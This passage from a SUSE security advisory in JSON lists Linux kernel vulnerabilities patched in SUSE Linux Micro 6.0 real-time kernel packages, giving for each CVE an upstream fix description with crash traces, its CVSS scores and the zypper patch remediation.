"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71235",
"url": "https://www.suse.com/security/cve/CVE-2025-71235"
},
{
"category": "external",
"summary": "SUSE Bug 1258469 for CVE-2025-71235",
"url": "https://bugzilla.suse.com/1258469"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71235"
},
{
"cve": "CVE-2025-71236",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71236"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Validate sp before freeing associated memory\n\nSystem crash with the following signature\n[154563.214890] nvme nvme2: NVME-FC{1}: controller connect complete\n[154564.169363] qla2xxx [0000:b0:00.1]-3002:2: nvme: Sched: Set ZIO exchange threshold to 3.\n[154564.169405] qla2xxx [0000:b0:00.1]-ffffff:2: SET ZIO Activity exchange threshold to 5.\n[154565.539974] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed - 0078 0080 0000.\n[154565.545744] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed - 0078 00a0 0000.\n[154565.545857] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.552760] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.553079] BUG: kernel NULL pointer dereference, address: 00000000000000f8\n[154565.553080] #PF: supervisor read access in kernel mode\n[154565.553082] #PF: error_code(0x0000) - not-present page\n[154565.553084] PGD 80000010488ab067 P4D 80000010488ab067 PUD 104978a067 PMD 0\n[154565.553089] Oops: 0000 1 PREEMPT SMP PTI\n[154565.553092] CPU: 10 PID: 858 Comm: qla2xxx_2_dpc Kdump: loaded Tainted: G OE ------- --- 5.14.0-503.11.1.el9_5.x86_64 #1\n[154565.553096] Hardware name: HPE Synergy 660 Gen10/Synergy 660 Gen10 Compute Module, BIOS I43 09/30/2024\n[154565.553097] RIP: 0010:qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553141] Code: 00 00 e8 58 a3 ec d4 49 89 e9 ba 12 20 00 00 4c 89 e6 49 c7 c0 00 ee a8 c0 48 c7 c1 66 c0 a9 c0 bf 00 80 00 10 e8 15 69 00 00 \u003c4c\u003e 8b 8d f8 00 00 00 4d 85 c9 74 35 49 8b 84 24 00 19 00 00 48 8b\n[154565.553143] RSP: 0018:ffffb4dbc8aebdd0 EFLAGS: 00010286\n[154565.553145] RAX: 0000000000000000 RBX: ffff8ec2cf0908d0 RCX: 0000000000000002\n[154565.553147] RDX: 0000000000000000 RSI: ffffffffc0a9c896 RDI: ffffb4dbc8aebd47\n[154565.553148] RBP: 0000000000000000 R08: ffffb4dbc8aebd45 R09: 0000000000ffff0a\n[154565.553150] R10: 0000000000000000 R11: 000000000000000f R12: ffff8ec2cf0908d0\n[154565.553151] R13: ffff8ec2cf090900 R14: 0000000000000102 R15: ffff8ec2cf084000\n[154565.553152] FS: 0000000000000000(0000) GS:ffff8ed27f800000(0000) knlGS:0000000000000000\n[154565.553154] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[154565.553155] CR2: 00000000000000f8 CR3: 000000113ae0a005 CR4: 00000000007706f0\n[154565.553157] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[154565.553158] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[154565.553159] PKRU: 55555554\n[154565.553160] Call Trace:\n[154565.553162] \u003cTASK\u003e\n[154565.553165] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553172] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553177] ? qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553215] ? __die_body.cold+0x8/0xd\n[154565.553218] ? page_fault_oops+0x134/0x170\n[154565.553223] ? snprintf+0x49/0x70\n[154565.553229] ? exc_page_fault+0x62/0x150\n[154565.553238] ? asm_exc_page_fault+0x22/0x30\n\nCheck for sp being non NULL before freeing any associated memory",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71236",
"url": "https://www.suse.com/security/cve/CVE-2025-71236"
},
{
"category": "external",
"summary": "SUSE Bug 1258442 for CVE-2025-71236",
"url": "https://bugzilla.suse.com/1258442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71236"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22979",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22979"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: fix memory leak in skb_segment_list for GRO packets\n\nWhen skb_segment_list() is called during packet forwarding, it handles\npackets that were aggregated by the GRO engine.\n\nHistorically, the segmentation logic in skb_segment_list assumes that\nindividual segments are split from a parent SKB and may need to carry\ntheir own socket memory accounting. Accordingly, the code transfers\ntruesize from the parent to the newly created segments.\n\nPrior to commit ed4cccef64c1 (\"gro: fix ownership transfer\"), this\ntruesize subtraction in skb_segment_list() was valid because fragments\nstill carry a reference to the original socket.\n\nHowever, commit ed4cccef64c1 (\"gro: fix ownership transfer\") changed\nthis behavior by ensuring that fraglist entries are explicitly\norphaned (skb-\u003esk = NULL) to prevent illegal orphaning later in the\nstack. This change meant that the entire socket memory charge remained\nwith the head SKB, but the corresponding accounting logic in\nskb_segment_list() was never updated.\n\nAs a result, the current code unconditionally adds each fragment\u0027s\ntruesize to delta_truesize and subtracts it from the parent SKB. Since\nthe fragments are no longer charged to the socket, this subtraction\nresults in an effective under-count of memory when the head is freed.\nThis causes sk_wmem_alloc to remain non-zero, preventing socket\ndestruction and leading to a persistent memory leak.\n\nThe leak can be observed via KMEMLEAK when tearing down the networking\nenvironment:\n\nunreferenced object 0xffff8881e6eb9100 (size 2048):\n comm \"ping\", pid 6720, jiffies 4295492526\n backtrace:\n kmem_cache_alloc_noprof+0x5c6/0x800\n sk_prot_alloc+0x5b/0x220\n sk_alloc+0x35/0xa00\n inet6_create.part.0+0x303/0x10d0\n __sock_create+0x248/0x640\n __sys_socket+0x11b/0x1d0\n\nSince skb_segment_list() is exclusively used for SKB_GSO_FRAGLIST\npackets constructed by GRO, the truesize adjustment is removed.\n\nThe call to skb_release_head_state() must be preserved. As documented in\ncommit cf673ed0e057 (\"net: fix fraglist segmentation reference count\nleak\"), it is still required to correctly drop references to SKB\nextensions that may be overwritten during __copy_skb_header().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22979",
"url": "https://www.suse.com/security/cve/CVE-2026-22979"
},
{
"category": "external",
"summary": "SUSE Bug 1257228 for CVE-2026-22979",
"url": "https://bugzilla.suse.com/1257228"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22979"
},
{
"cve": "CVE-2026-22982",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22982"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mscc: ocelot: Fix crash when adding interface under a lag\n\nCommit 15faa1f67ab4 (\"lan966x: Fix crash when adding interface under a lag\")\nfixed a similar issue in the lan966x driver caused by a NULL pointer dereference.\nThe ocelot_set_aggr_pgids() function in the ocelot driver has similar logic\nand is susceptible to the same crash.\n\nThis issue specifically affects the ocelot_vsc7514.c frontend, which leaves\nunused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as\nit uses the DSA framework which registers all ports.\n\nFix this by checking if the port pointer is valid before accessing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22982",
"url": "https://www.suse.com/security/cve/CVE-2026-22982"
},
{
"category": "external",
"summary": "SUSE Bug 1257179 for CVE-2026-22982",
"url": "https://bugzilla.suse.com/1257179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22982"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
